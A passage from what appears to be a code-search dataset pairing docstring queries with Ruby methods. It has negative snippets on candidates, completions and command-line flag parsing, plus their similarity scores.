"def get_results\n\t\tputs \"\"\n\t\twinner = nil\n\t\t@candidates.each do |candidate|\n\t\t\t@winner ||= candidate\n\t\t\t@winner = candidate if @votes.count(candidate) > @votes.count(@winner)\n\t\t\tsleep(1)\n\t\t\tputs \"#{candidate.name} has #{@votes.count(candidate)} votes.\"\n\t\tend\n\t\tsleep(1)\n\t\tputs \"\\n#{@winner.name} won the election!\"\n\tend",
"def suggested_people\n SuggestedPeople.people(@api_key, @https)\n end",
"def auto_completions\n\n comps =\t \"{ name = 'Completions';\\n\"\n comps += \"scope = 'source.actionscript.3';\"\n comps += \"settings = \"\n comps += \"{\\n\\tcomment = '#{@framework} completion list';\"\n comps += \"\\n\\tcompletions = (\"\n\n elements =\t@class_names +\n @method_names +\n @protected_method_names +\n @constant_names +\n @property_names +\n @protected_properties\n\n elements = elements.uniq.sort\n\n elements.each do | item |\n comps += \"'\" + item + \"'\"\n comps += \",\" if item != elements.last\n end\n\n comps += \");\\n};\\nuuid = '\" + `uuidgen`.chomp + \"'; };\\n}\"\n\n end",
"def infobox_candidates(infobox)\n return @infobox_cache[infobox] unless @infobox_cache[infobox].nil?\n @infobox_cache[infobox] = candidate_set_for_name(infobox,@category_filters)\n end",
"def suggestions\n suggest(search_suggestions)\n end",
"def rl_completion_matches(text, entry_function)\r\n matches = 0\r\n match_list = []\r\n match_list[1] = nil\r\n while (string = send(entry_function, text, matches))\r\n match_list[matches+=1] = string\r\n match_list[matches+1] = nil\r\n end\r\n\r\n # If there were any matches, then look through them finding out the\r\n # lowest common denominator. That then becomes match_list[0].\r\n if (matches!=0)\r\n compute_lcd_of_matches(match_list, matches, text)\r\n else # There were no matches.\r\n match_list = nil\r\n end\r\n return (match_list)\r\n end",
"def build_candidates\n doc = Nokogiri::HTML(open(\"http://www.google.com/search?q=#{query}&num=30\"))\n doc.xpath('//div/cite').each do |node|\n @candidates << Sanitize.clean(node)\n end\n\n @candidates = @candidates.collect{|c| c if c.include?(\"http\") && (c.include?(\"youtube.com\") || c.include?(\"soundcloud.com\") || c.include?(\"bandcamp.com\")) }.compact\n\n #replace each with url, score, and title\n set = []\n\n @candidates.each do |c|\n if c.include?(\"youtube\")\n set << get_youtube(c)\n elsif c.include?(\"soundcloud\")\n set << get_soundcloud(c)\n elsif c.include?(\"bandcamp\")\n set << get_bandcamp(c)\n end\n end\n\n @candidates = set\n @candidates.sort!{|x,y| y[:score] <=> x[:score]}\n puts @candidates.count\n end",
"def suggestions\n @users = User.all.to_ary.select { |user| user != current_user &&\n !current_user.to_fr_ids.include?(user.id) &&\n !current_user.friends.include?(user) &&\n !current_user.from_fr_ids.include?(user.id)\n }\n @requests = current_user.received_friend_requests\n end",
"def scan_resume_all\n\t\t\tb=scan_list_uids\n\t\t\tb.each {|uuid|\n\t\t\t\tscan_resume(uuid)\n\t\t\t}\n\t\t\treturn b\n\t\tend",
"def sent_proposals\n reversed_matches = Array.new(@group_size)\n @best_proposals.each_with_index do |e, i|\n reversed_matches[e] = i if e\n end\n reversed_matches\n end",
"def resolved_ids\n return get_and_remove_done(@resolvers).map(&:id)\n end",
"def index\n # @candidates = Candidate.all\n @candidates = Position.find(params[:position_id]).candidates\n end",
"def candidates_included_in_all_the_others(candidates_in_correct_position)\n\tcandidates_in_correct_position.each do |small|\n\t\tok = true\n\t\tcandidates_in_correct_position.each do |big|\n\t\t\tif small!=big\n\t\t\t\tunless big.source.position.include?(small.source.position)\n\t\t\t\t\tok = false\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\treturn small if ok\n\tend\n\tnil\nend",
"def max_candidates=(value)\n @max_candidates = value\n end",
"def qualified_candidates (collection)\n match=[]\n \n collection.each do |x|\n if years_of_experience(x[:years_of_experience]) && github_points(x[:github_points]) && knowledge(x[:languages]) && applied_time(x[:date_applied]) && old_enough(x[:age])\n match << (x)\n end\n end\n\n match\nend",
"def index\n @candidates = Candidate.all\n end",
"def index\n @candidates = Candidate.all\n end",
"def index\n @candidates = Candidate.all\n end",
"def index\n @candidates = Candidate.all\n end",
"def index\n @candidates = Candidate.all\n end",
"def term_candidates(cyc_id)\n return @term_cache[cyc_id] unless @term_cache[cyc_id].nil?\n @term_cache[cyc_id] = create_candidate_set(\"\",[@name_service.find_by_id(cyc_id)])\n end",
"def converge_complete\n detect_unprocessed_resources\n end",
"def index\n @candidates = Candidate.limit(100)\n end",
"def suggest(query_term)\n @qt = query_term\n @candidates = Candidates.new\n srs = for_term(@qt)\n\n srs.each do |seg|\n @lex.search(seg).each do |result|\n found(result)\n end\n end\n\n # Run substring rules\n # Check confidence\n # Run ngrams\n # Return most confident candidate set\n return @candidates\n end",
"def term_candidates(cyc_id)\n return @term_cache[cyc_id] unless @term_cache[cyc_id].nil?\n @term_cache[cyc_id] = create_candidate_set(\"\",[@name_service.find_by_id(cyc_id)])\n end",
"def lookup_proposals\n return RAILS_CACHE.fetch_object(\"proposals_for_event_#{self.id}\") do\n self.proposals\n end\n end",
"def scan_resume_all\r\n\t\tb=scan_list_uids\r\n\t\tb.each {|uuid|\r\n\t\t\tscan_resume(uuid)\r\n\t\t}\r\n\t\treturn b\r\n\tend",
"def completed\n candidate_events.select(&:completed?)\n end",
"def candidates_below_default\n Array(@ranking[@default_rank+1...@ranking.length]).flatten.sort\n end",
"def open_job_candidates\n authorize(JobCandidate.new)\n if active_job_candidate_list.present?\n @open_job_candidates = active_job_candidate_list.includes(:job)\n .where(\"job_candidates.status in (?)\",\n JobCandidate.statuses_opened)\n .page(params[:page])\n end\n end",
"def complete(original_terms, prefix, subject)\n #cache isn't valid of the basis changes\n list = possible_completions(prefix, subject)\n matcher = @completion_matchers[prefix] ||= completion_matcher(original_terms, prefix, list, subject)\n\n begin\n Timeout::timeout(CompletionDeadline) do\n matcher.find_completions\n end\n rescue Timeout::Error\n #That's ok.\n end\n\n return matcher.response\n end",
"def selected\n tasks = []\n @widget.selection.selected_each do |model, path, iter|\n tasks << iter[0]\n end\n return tasks\n end",
"def item_target_candidates\r\n if item.for_opponent?\r\n opponents_unit.alive_members\r\n elsif item.for_user?\r\n [subject]\r\n elsif item.for_dead_friend?\r\n friends_unit.dead_members\r\n else\r\n friends_unit.alive_members\r\n end\r\n end",
"def with_candidates &b\n # Multiple assignment reduces (s)teps while debugging\n outermost, @candidates, @on_admission = @candidates.nil?, (@candidates || []), (@on_admission || [])\n begin\n b.call\n rescue Exception\n # Do not accept any of these candidates, there was a problem:\n @candidates = [] if outermost\n raise\n ensure\n if outermost\n while @candidates\n # Index the accepted instances in the constellation:\n candidates = @candidates\n on_admission = @on_admission\n @candidates = nil\n @on_admission = nil\n candidates.each do |instance|\n instance.class.index_instance(self, instance)\n loggers.each{|l| l.call(:assert, instance.class, instance.identifying_role_values)}\n end\n on_admission.each do |b|\n b.call\n end\n end\n end\n end\n end",
"def list_optimized total, candidate: 2\n primes = []\n while primes.count < total\n prime = next_prime candidate\n primes << prime\n candidate = prime.next\n end\n primes\n end"
] | [
"0.6400225",
"0.6264429",
"0.6093053",
"0.60641855",
"0.60383046",
"0.59851754",
"0.59327793",
"0.59178853",
"0.5872673",
"0.58314174",
"0.58277404",
"0.5827605",
"0.57802844",
"0.57467395",
"0.5732374",
"0.5730715",
"0.57088095",
"0.5698806",
"0.5693608",
"0.5651471",
"0.55478907",
"0.5505228",
"0.54691106",
"0.54657596",
"0.5450331",
"0.5448238",
"0.54439634",
"0.5429537",
"0.54168713",
"0.54134405",
"0.5401506",
"0.539839",
"0.53975606",
"0.5379803",
"0.53731954",
"0.5363461",
"0.5355942",
"0.53335804",
"0.52979416",
"0.52953094",
"0.52939093",
"0.5287536",
"0.5258772",
"0.52545714",
"0.52393585",
"0.523923",
"0.52222335",
"0.5166094",
"0.51652515",
"0.5146323",
"0.5134337",
"0.51262826",
"0.5112659",
"0.50970745",
"0.5096827",
"0.5095957",
"0.5090813",
"0.5070825",
"0.5063286",
"0.5055548",
"0.50458825",
"0.5044335",
"0.50363326",
"0.5029763",
"0.5002799",
"0.49940398",
"0.49851543",
"0.4979928",
"0.49779323",
"0.49671665",
"0.4956082",
"0.49434292",
"0.49363327",
"0.4934917",
"0.49319512",
"0.4931584",
"0.49252483",
"0.49138802",
"0.49026546",
"0.48999113",
"0.48806614",
"0.48806614",
"0.48806614",
"0.48806614",
"0.48806614",
"0.48773596",
"0.4876549",
"0.48748434",
"0.4831362",
"0.4830017",
"0.4817561",
"0.4813881",
"0.48112294",
"0.48090443",
"0.48074457",
"0.480716",
"0.47979838",
"0.47857153",
"0.47855628",
"0.4780523"
] | 0.57600236 | 13 |
An array of Flag::Syntax including only short (single dash) flags. | def short_flag_syntax
@short_flag_syntax ||= flag_syntax.find_all { |ss| ss.flag_style == :short }
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def dashed_flags *settings_and_names\n settings_and_names.map{|args| dashed_flag_for(*args) }.compact\n end",
"def matching_flag_strings\n @flags.map do |_flag, flag_syntax, negative|\n negative ? flag_syntax.negative_flag : flag_syntax.positive_flag\n end\n end",
"def flags\n [long, short].compact\n end",
"def flags\n [long, negative_long, short].compact\n end",
"def flags\n return [] unless options[\"flags\"]\n options[\"flags\"].map do |options|\n Flag.new options\n end\n end",
"def long_flag_syntax\n @long_flag_syntax ||= flag_syntax.find_all { |ss| ss.flag_style == :long }\n end",
"def flags\n match(/Flags\\s+:\\s+(.+)$/).split rescue []\n end",
"def flags\n match(/Flags\\s+:\\s+(.+)$/).split rescue []\n end",
"def effective_flags\n @effective_flags ||= flag_syntax.flat_map(&:flags)\n end",
"def to_argv\n flags = []\n each do |f,v|\n m = f.to_s.size == 1 ? '-' : '--'\n case v\n when Array\n v.each{ |e| flags << \"#{m}#{f}='#{e}'\" }\n when true\n flags << \"#{m}#{f}\"\n when false, nil\n # nothing\n else\n flags << \"#{m}#{f}='#{v}'\"\n end\n end\n flags\n end",
"def flags\n flags = Array.new\n if self.flag_attr\n self.flag_attr.split(\", \").each do |flag|\n flags << flag.to_sym\n end\n end\n\n return flags\n end",
"def canonical_syntax_strings\n @canonical_syntax_strings ||= flag_syntax.map(&:canonical_str)\n end",
"def generate_cli_flags\n @flags.map{|pair| pair.join(' ')}.join(' ').gsub(' true','')\n end",
"def valid_options\n %i(\n\n ) # end array\n end",
"def scm_flags\n @flags.join(\" \")\n end",
"def flag\n flags.join(\", \")\n end",
"def flag_args(ci_gcc_config)\n return [] if ci_gcc_config[:flags].nil?\n\n ci_gcc_config[:flags]\n end",
"def whitelisted_flags\n flags.select &:allowed\n end",
"def flag_list(flag, list)\n list&.map do |value|\n \"#{flag}=#{value}\"\n end\n end",
"def flag_list(flag, list)\n list&.map do |value|\n \"#{flag}=#{value}\"\n end\n end",
"def switches\n [short, long].map(&:to_s)\n end",
"def optparse_args\n if short\n [\"--#{name}\", \"-#{short}\", desc, :REQUIRED]\n else\n [\"--#{name}\", desc, :REQUIRED]\n end\n end",
"def std_flags\n # FIXME: this is bogus\n m = method(:help_text)\n boolean :help, :flag => \"h\", :doc => \"display this help\"\n boolean :verbose, :flag => \"v\", :doc => \"verbose output\"\n boolean :debug, :flag => \"D\", :doc => \"turn on debugging\"\n end",
"def get #:nodoc:\n p = Array.new\n p.push(@long_form)\n p.push(@short_form) if @short_form != \"\"\n p.push(@arg_flag)\n return p\n end",
"def flags\n @flags ||= Set.new([])\n end",
"def switches\n [long, negative_long, short].compact\n end",
"def generate_flags_flat overrides = {}\n generate_flags(overrides).map { |k, v| [k, v] }.concat(%w|--force .|).flatten\n end",
"def make_flag(options)\n\tflagString=\" \"\n\tif(options.list != nil)\n\t\tflagString+=\" -l\"\n\tend\n\tif(options.all != nil)\n\t\tflagString+= \" -a\"\n\tend\n\treturn flagString\nend",
"def thor_options_to_optparse\n flags = []\n %i[color progress debug interactive].each do |option|\n if options[option] then flags << \"--#{option}\"\n else flags << \"--no-#{option}\"\n end\n end\n flags\n end",
"def xlate_flags()\n flags = []\n flags.push('More') if (flag_more?)\n flags.push('Start') if (flag_start?)\n flags.push('Stop') if (flag_stop?)\n flags.push('Watchdog') if (flag_watchdog?)\n return(\"#{flags.join(',')}\") if (flags.length != 0)\n return(\"None\")\n end",
"def flags(*args)\n Boxen::Flags.new *args\n end",
"def normalize_flags(flags)\n if flags.is_a?(Array)\n flags.uniq.sort.join(' ')\n else\n flags\n end\n end",
"def for_option_parser\n [short, long, return_type, description].flatten.reject{ |o| o.to_s.empty? }\n end",
"def getopt_args\n if short\n [[\"--#{name}\", \"-#{short}\", GetoptLong::REQUIRED_ARGUMENT]]\n else\n [[\"--#{name}\", GetoptLong::REQUIRED_ARGUMENT]]\n end\n end",
"def flags\n # Hash#index becomes Hash#key in Ruby 1.9.\n index_method = RUBY_VERSION < '1.9' ? :index : :key\n # Map the integer @flags to array of flag symbols\n # (This may be cute but it's not very efficient!)\n [ @flags ].flatten.first.to_s(2). # extract flags as binary string\n split(//).map{ |bit| bit.to_i }. # convert to array of bits\n reverse. # reverse order to work from lsb\n inject([]) { |r,v| r << v * (1 << r.length) }. # convert each bit to decimal\n reject { |flag| flag == MAGIC_FLAGS[:none] }. # discard MAGIC_NONE flag\n map { |int_flag| MAGIC_FLAGS.send(index_method, int_flag) } # map decimal integer to symbol\n end",
"def parse_flags(obj, opt, args)\n x = opt.sub(/^-/, '')\n #c = 0\n x.split(//).each do |k|\n #if obj.respond_to?(\"#{k}=\")\n obj.send(\"#{k}=\", true)\n #else\n # obj.option_missing(x, true)\n #end\n end\n end",
"def extract_flags\n @flags.clear\n rules.each_with_index do |r, i|\n @flags << i unless r.alternatives.size == 1\n end\n end",
"def flag _args\n \"flag _args;\" \n end",
"def describe_flags(flags,format)\n d = ''\n flags.keys.each { |f|\n if f=='c' then\n if format=='tex' then f=\"$\\\\int$\" end\n if format=='plain' then f=\"(calculus)\" end\n if format=='html' then f=\"∫\" end\n end\n if f=='s' && format=='tex' then f=\"${}_\\\\textup{s}$\" end\n d=d+f unless f=='o'\n }\n return d\nend",
"def flag_options\n return @flag_options unless @flag_options.nil?\n @flag_options = ''\n @flag_options << ' --auto-attach' if new_resource.auto_attach\n @flag_options << ' --force' if new_resource.force\n @flag_options << ' --insecure' if new_resource.insecure\n @flag_options\n end",
"def syntax\n t = @cmd_args\n t = [[t]] if !t.is_a? Array\n\n args = [] \n count = 0\n t.each do |expected_array|\n count += 1\n if count == 1\n str = \"Syntax: #{@cmd_name}\"\n else\n str = \" #{@cmd_name}\"\n end\n expected_array.each do |expected|\n # each expected arg.\n str += case expected\n when :arg_none then \"\"\n when :arg_dir! then \" <direction>\"\n when :arg_str! then \" <string literal>\"\n when :arg_word!then \" <word>\"\n when :arg_int! then \" <#>\"\n when :arg_obj_inv! then \" <item>\"\n when :arg_obj_room! then \" <item>\"\n when :arg_obj_inv_or_room! then \" <item>\"\n when :arg_class! then \" <Class>\"\n when :arg_player_in_game! then \" <player in game>\"\n when :arg_player_offline! then \" <any player>\"\n when :arg_actor_room! then \" <npc/player>\"\n when String then \" \" + expected \n else \"\"\n \n end\n end \n args << str\n end\n return args\n end",
"def format_flags(flags)\n # other flags like \"Old\" should be hidden here\n flags = flags.map {|flag| FLAGMAP[flag] || flag}\n flags.delete(\"Old\")\n if flags.delete(:Seen).nil?\n flags << '+' # unread\n end\n flags.join('')\n end",
"def flag(*names)\n names = [names].flatten\n GLI.verify_unused(names,flags,switches,\"in command #{name}\")\n flag = Flag.new(names,@next_desc,@next_arg_name,@next_default_value,@next_long_desc)\n flags[flag.name] = flag\n clear_nexts\n end",
"def flag(*names)\n options = extract_options(names)\n names = [names].flatten\n\n verify_unused(names)\n flag = Flag.new(names,options)\n flags[flag.name] = flag\n\n clear_nexts\n flags_declaration_order << flag\n flag\n end",
"def short_flag_exist?(flag)\n flags.select { |f| f.short == flag }.any?\n end",
"def test_multi_stringflag_as_strings\n opts = @p.parse %w(--xyz dog --xyz cat)\n assert_equal true, opts[:xyz_given]\n assert_equal [\"dog\",\"cat\"], opts[:xyz]\n assert_equal [], opts[:abc] # note, multi-args default to empty array\n assert_nil opts[:ghi_given]\n assert_equal [\"gg\",\"hh\"], opts[:ghi]\n end",
"def flags\n @flags\n end",
"def flags\n @flags\n end",
"def elementary_flag_names\n flagset_builder.elementary_flag_names\n end",
"def flags\n @flags ||= Array.wrap(Flag.where(:published => true))\n end",
"def format_flag(flag)\n if flag.length == 1\n \" -#{flag}\"\n else\n \" --#{flag.to_s.tr('_', '-')}\"\n end\n end",
"def options # :nodoc:\n [].tap do |o|\n o << \"Lazy\" if lazy?\n o << \"Reverse\" if reverse?\n o << \"Exclude [#{all_excluded_words.join(\", \")}]\" if excluded_words.any?\n o << \"No Options\" if o.empty?\n end\n end",
"def parse argv\n @bare.clear\n eoo = argv.index '--' # end of options\n if eoo\n tail = argv[eoo+1 .. ]\n argv = argv[ .. eoo-1]\n end\n re = /^-{1,2}(?=[^-])/\n for first,second in argv.chunk_while{ _1 =~ re and _2 !~ re }\n case first\n when /^--(?i:no)-(?=[^-])/\n # --no-long\n p = plong $~.post_match\n raise \"#{p.long} is not boolean\" unless p.boolean\n @buffer[p] = false\n @bare.push second if second\n when /^--(?=[^-])/\n # --long\n p = plong $~.post_match\n if p.boolean\n @buffer[p] = true\n @bare.push second if second\n else\n @buffer[p] = second\n end\n when /^-(?=[^-])(?!.*[0-9])/\n # -short\n letters = $~.post_match.chars\n b,o = letters.map{ pshort _1 }.partition &:boolean\n b.each{ @buffer[_1] = true }\n o.each{ @buffer[_1] = nil }\n if second\n if o.empty?\n @bare.push second\n else\n @buffer[o.pop] = second\n end\n end\n else\n # bare\n @bare.push first\n end\n end\n @bare.concat tail if tail\n end",
"def mask_array\n @mask.split('')\n end",
"def dashed_flag_for setting_name, flag_name=nil\n return unless self[setting_name]\n flag_name ||= setting_name\n (self[setting_name] == true ? \"--#{flag_name.to_s.gsub(/_/,\"-\")}\" : \"--#{flag_name.to_s.gsub(/_/,\"-\")}=#{self[setting_name]}\" )\n end",
"def required_flags\n flags.select &:required\n end",
"def symbols\n @flags.keys\n end",
"def program_options\n [\n # The values of the array are,\n # [long_option, short_option and parameter, description, code to execute]\n ['--google', '-g', \"Format for Google blogger.\",\n lambda { |value| options.google = true }\n ],\n ['--jayway', '-j', \"Format for Jayway blog.\",\n lambda { |value| options.jayway = true }\n ],\n ['--utf', '-u', \"Include meta charset utf8\",\n lambda { |value| options.utf = true }\n ],\n ['--stylesheet', '-s', \"Add a stylesheet, md.css\",\n lambda { |value| options.stylesheet = true }\n ],\n ['--verbose', '-v', \"Log to standard output.\",\n lambda { |value| options.verbose = true }\n ],\n ['--version', '-V', \"Display the program version.\",\n lambda { |value|\n puts \"#{program_name}, version #{PROGRAM_VERSION}\"\n exit\n }\n ]\n ]\nend",
"def flag(*names)\n names = [names].flatten\n verify_unused(names,flags,switches,\"in global options\")\n flag = Flag.new(names,@@next_desc,@@next_arg_name,@@next_default_value,@@next_long_desc)\n flags[flag.name] = flag\n clear_nexts\n end",
"def lame_flag_map\n { '--tt': :title,\n '--ta': :artist,\n '--tl': :album,\n '--ty': :year,\n '--tn': :t_num,\n '--tg': :genre }\n end",
"def names\n @opt_types.keys.map {|e| undasherize e }\n end",
"def dashed_flag_for setting_name, flag_name=nil\n return unless Settings[setting_name]\n flag_name ||= setting_name\n (Settings[setting_name] == true ? \"--#{flag_name.to_s.gsub(/_/,\"-\")}\" : \"--#{flag_name.to_s.gsub(/_/,\"-\")}=#{Settings[setting_name]}\" )\n end",
"def stow_command_flags\n flags = ''\n flags += \"-t #{stow_target}\" unless stow_target.nil?\n flags += \"-d #{stow_path}\" unless stow_path.nil?\n flags\n end",
"def wix_extension_switches(arr)\n \"#{arr.map {|e| \"-ext '#{e}'\"}.join(' ')}\"\n end",
"def test_stringflag_as_flag\n @p.opt :xyz, \"desc\", :type => :stringflag\n @p.opt :abc, \"desc\", :type => :flag\n opts = @p.parse %w(--xyz )\n assert_equal true, opts[:xyz_given]\n assert_equal true, opts[:xyz]\n assert_equal false, opts[:abc]\n opts = @p.parse %w(--xyz --abc)\n assert_equal true, opts[:xyz_given]\n assert_equal true, opts[:xyz]\n assert_equal true, opts[:abc]\n end",
"def get_flags( options )\n flags = 0\n if options[:flags] then\n if options[:flags].respond_to?(:each) then\n options[:flags].each { |f| flags = flags | f }\n else\n flags = options[:flags]\n end\n end\n return flags\n end",
"def flags=(flags)\n self.flag_attr = flags.map{|flag| flag.to_s}.join(\", \");\n end",
"def parse_from_human(boolean_pattern)\n self[0...length] = [] #remove the last pattern if it existed\n boolean_pattern.each_char do |char|\n if char == '1'\n push true\n elsif char == '0'\n push false\n elsif char == '-'\n push nil\n else\n raise \"Unexpected pattern character: #{char}\"\n end\n end\n end",
"def extract_flag(p, flag)\n breakdown = flag.split(\"*\")\n if flag.match(/^---.*/)\n parse_error! p, \"Flags must be prefixed with two hyphens (-); #{flag} has more than that.\"\n end\n\n if breakdown.length > 2\n parse_error! p, \"The flag #{flag} can have only one *. * is used to indicate the short flag name.\"\n end\n prefix, suffix = breakdown\n if suffix\n if suffix.length == 0\n parse_error! p, \"The flag #{flag} has a short-name indicator (*) at the end of the flag. This special character should be placed before the letter you wish to use as the short name for the flag.\"\n end\n short = suffix.slice(0)\n suffix = suffix.slice(1..-1)\n flag = \"#{prefix}#{short}#{suffix}\"\n else\n short = nil\n end\n # TODO validate all caps, plus optional surrounding matched [ ] around arg\n flag_arg = p.advance_token == :EOL ? nil : p.current_token\n if (p.peek_token != :EOL)\n parse_error! p, \"#{flag} can take at most one argument, but more than one is provided.\"\n end\n description = parse_command_definition_description(p.parser_from_children)\n flag = CommandFlag.new(flag, flag_arg, short, description)\n end",
"def options\n ops = {}\n @options.each_value do |data|\n if data.given?\n if !data.short_name.nil?\n ops[data.short_name] = nil\n else\n ops[data.long_name] = nil\n end\n end\n end\n return ops.keys\n end",
"def modifier_flags(include_shift = true)\n modifiers = self.modifiers.dup\n modifiers.delete(\"S\") unless include_shift\n flags = 0\n modifiers.each { |modifier| flags = flags | MODIFIER_MAP[modifier] }\n flags\n end",
"def flags; end",
"def flags(path)\n if @manifest_entry ||= nil\n return manifest_entry.flags[path] || \"\"\n end\n pnode = parents[0].raw_changeset[0]\n \n orig = @repo.dirstate.copy_map[path] || path\n node, flag = @repo.manifest.find(pnode, orig)\n return @repo.dirstate.flags(@repo.working_join(path))\n end",
"def to_options_array\n options_array = []\n attributes.each do |attr_name, value|\n next if value.blank?\n\n # explicit check for == true to flag-only options that have no value, like --extract \"['cluster', 'metadata']\"\n if value == true\n options_array << Parameterizable.to_cli_opt(attr_name)\n else\n options_array += [Parameterizable.to_cli_opt(attr_name), value.to_s]\n end\n end\n options_array << self.class::PARAMETER_NAME if defined? self.class::PARAMETER_NAME\n options_array\n end",
"def to_s\n @flags.join(', ')\n end",
"def get_flag_path_array problem, solution, comment, flag\n if solution.nil?\n path = [problem, comment, flag]\n elsif comment.nil?\n path = [problem, solution, flag]\n else\n path = [problem, solution, comment, flag]\n end\n path\n end",
"def parse_smashed(arg)\n opts = {}\n # preceding dash and flag have been removed\n val = arg.dup\n loop {\n break if val.empty?\n char = val.slice!(0, 1)\n sym = @index[:short][char]\n raise \"unknown flag smashed in: #{char} in #{arg}\" unless sym\n\n spec = @option_specs.fetch(sym)\n if spec[:value]\n val.slice!(0, 1) if val[0] == '='\n if val.empty?\n opts[sym] = nil # tell parse() we need another arg; ugh, hack!\n else\n opts[sym] = val\n end\n break # a value always ends the smash\n else\n opts[sym] = true\n end\n }\n opts\n end",
"def short_for_optparse\n (arg and long.nil?) ? (\"%s %s\" % [short, arg]) : short\n end",
"def split_args(ary)\n\tfiles = []\n\topts = []\n\tc = false\n\tary.each do |i|\n\t\tnext if i == '-'\n\t\tif i == '--' then\n\t\t\tc = true\n\t\t\tnext\n\t\tend\n\t\tfiles << i if c or not (i =~ /^-/)\n\t\topts << i if (not c) and (i =~ /^-/)\n\tend\n\t[files, opts]\nend",
"def flag_as(flag)\n raise ArgumentError if flag.class != String\n @flag = flag\n end",
"def range_all\n [ range(:upper_alphas), \n range(:lower_alphas), \n range(:numerals), \n range(:symbols_1), \n range(:symbols_2), \n range(:symbols_3), \n range(:symbols_4), \n range(:symbols_5), \n range(:symbols_6),\n range(:single_quotes),\n range(:double_quotes),\n range(:backtick) ]\n end",
"def _flag_nations\n %w{ar cc it de ie fr es en goo br po pt }.sort\nend",
"def form_flagstring(f, fall)\n\t\tflagSelectAll = (!fall.nil? && fall.to_s.downcase == \"all\")\n\t\tif(flagSelectAll || f.nil? || f.empty?)\n\t\t\tflagStr = \"all\"\n\t\telse\n\t\t\tflagStr = f.join(\"|\")\n\t\tend\n\n\t\treturn flagStr\n\tend",
"def extract_command_flags!(parameters)\n raw_command_flags = parameters.flatten.find_all { |arg| arg.start_with? \"--\" }\n parameters.delete_if { |param| raw_command_flags.include? param }\n\n flag_names = raw_command_flags.map { |flag| flag[/--(.+)$/,1].underscore.to_sym }\n flag_values = [ true ] * flag_names.count\n Hash[flag_names.zip(flag_values)]\n end",
"def valid_options\n self::OPTIONS.map(&:to_s).join(', ')\n end",
"def get_flags( remove = nil )\n\n\t\t# escape dashes for split\n\t\t@value.gsub!(/\\\\\\-/, \"<dash>\")\n\n\t\t# Remove command, split by spaces\n\t\tif remove.nil?\n\t\t\tvars = @value.split(/\\s-/)\n\t\telse\n\t\t\tvars = @value.gsub( remove, '' ).split(/\\s-/)\n\t\tend\n\n\t\t# Hash to return\n\t\tflags = Hash.new\n\t\t# for each pair of arguments, place in Hash\n\t\t# \tflags[ flag ] = argument\n\t\tvars.each do |str|\n\t\t\n\t\t\t# Extract key and value\n\t\t\tkey = str[/^\\S+/]\n\t\t\tvalue = str.sub(/^\\S+ /, '' ).gsub(\"<dash>\", '-')\n\n\t\t\t# parse true/false values\n\t\t\tvalue = true if value.downcase == 'yes' or value.downcase == 'true'\n\t\t\tvalue = false if value.downcase == 'no' or value.downcase == 'false'\n\n\t\t\tvalue.chop! if value[-1] =~ /\\s/\n\t\t\tvalue = nil if value == ''\n\n\t\t\tflags[ key.to_sym ] = value unless key.nil?\n\t\t\t\n\t\tend\t\t\n\n\t\t# Return result\n\t\tflags\n\n\tend",
"def flags\n response[\"flags\"]\n end",
"def flag(name,aliases,desc,long_desc,default_value,arg_name,must_match,type)\n abstract!\n end",
"def read_argv_flags argsIn\r\n skipVal = argsIn.length + 1\r\n argsIn.each_with_index do |argIn, ind|\r\n next if skipVal == ind\r\n arg = argIn.downcase()\r\n if arg[0].eql? '-'\r\n symAgr = strip_to_sym(arg)\r\n if @options[symAgr].is_a? String\r\n @options[symAgr] = argsIn[ind + 1]\r\n skipVal = ind + 1\r\n elsif @options[symAgr] == false\r\n @options[symAgr] = true\r\n elsif @options[symAgr].is_a? Array\r\n @options[symAgr] = argsIn[ind + 1]\r\n end\r\n elsif known_file_type arg\r\n @options[:f] << argIn.gsub(/(\\.\\/)|(\\.\\\\)/,'')\r\n end\r\n puts argIn\r\n end\r\n end",
"def extract(_options_str = nil)\n @options_str = _options_str if _options_str # hook for testing\n @extract ||= begin\n lines_containing_options = options_str.split(/\\n/).grep(/^[\\s\\t]+-/)\n all_options = lines_containing_options.inject([]) do |list, line|\n list + line.scan(/(?:^\\s+|,\\s)(-[\\w-]+)/).flatten\n end\n long_options = all_options.grep(/^--/).sort\n short_options = hide_short_flags? ? [] : (all_options - long_options).sort\n long_options + short_options\n end\n end",
"def flagging\n @title = 'Flags and their meaning'\n @css = 'flags.css'\n end",
"def _list_args args\n incl = []\n excl = []\n args.each do |e| \n if e[0] == '+'\n incl << e[1..-1]\n elsif e[0] == '-'\n excl << e[1..-1]\n else\n incl << e\n end\n end\n incl = nil if incl.empty?\n excl = nil if excl.empty?\n return incl, excl\n end",
"def _list_args args\n incl = []\n excl = []\n args.each do |e| \n if e[0] == '+'\n incl << e[1..-1]\n elsif e[0] == '-'\n excl << e[1..-1]\n else\n incl << e\n end\n end\n incl = nil if incl.empty?\n excl = nil if excl.empty?\n return incl, excl\n end",
"def get_flags(*files)\n matches = []\n begin\n files.each do |f|\n file = File.new(f, 'r')\n while (line = file.gets)\n m = line.match(/(^.*=)?/)\n matches << m[0] if m\n end\n file.close\n end\n rescue => err\n puts 'Exception: #{err}'\n err\n end\n matches.uniq.sort!\nend",
"def options(opt)\n []\n end",
"def parse(args)\n arg_list = arg_groups(args)\n options = DEFAULT_OPTIONS.dup\n options[:exclude] += default_excludes\n options[:locations] = arg_list.shift\n\n arg_list.reject(&:empty?).each do |set|\n flag, *args = set\n args.map! { |arg| arg.delete(\"/\") } # \"log/\" => \"log\"\n\n case flag\n when '-f', '--flags' then options[:flags] += args\n when '-e', '--exclude' then options[:exclude] += args\n else puts \"Unknown argument: #{flag}\"\n end\n end\n\n options\n end",
"def build_flags(*flags)\n _flags = *flags\n\n unless _flags.is_a?(Integer)\n _flags = MAGIC_NONE\n\n flags.flatten.each { |flag|\n if value = flag.is_a?(Integer) ? flag : MAGIC_FLAGS[flag.to_sym]\n _flags |= value\n else\n raise ArgumentError, \"#{value.nil? ? 'no such flag' : 'flag not available'}: #{flag}\"\n end\n }\n end\n\n _flags\n end",
"def allow_short_words\n not @emphasis[:ignore_short_words]\n end",
"def flags\n FLAGS.find_all{ |k,v| (self.Characteristics & k) != 0 }.map(&:last)\n end",
"def feature_args(ci_gcc_config)\n return [] if ci_gcc_config[:features].nil?\n\n ci_gcc_config[:features].map { |f| \"-f#{f}\" }\n end"
] | [
"0.68840307",
"0.68386215",
"0.67959255",
"0.67517674",
"0.66765195",
"0.63936436",
"0.6337571",
"0.6337571",
"0.61796635",
"0.61295277",
"0.6074809",
"0.60621995",
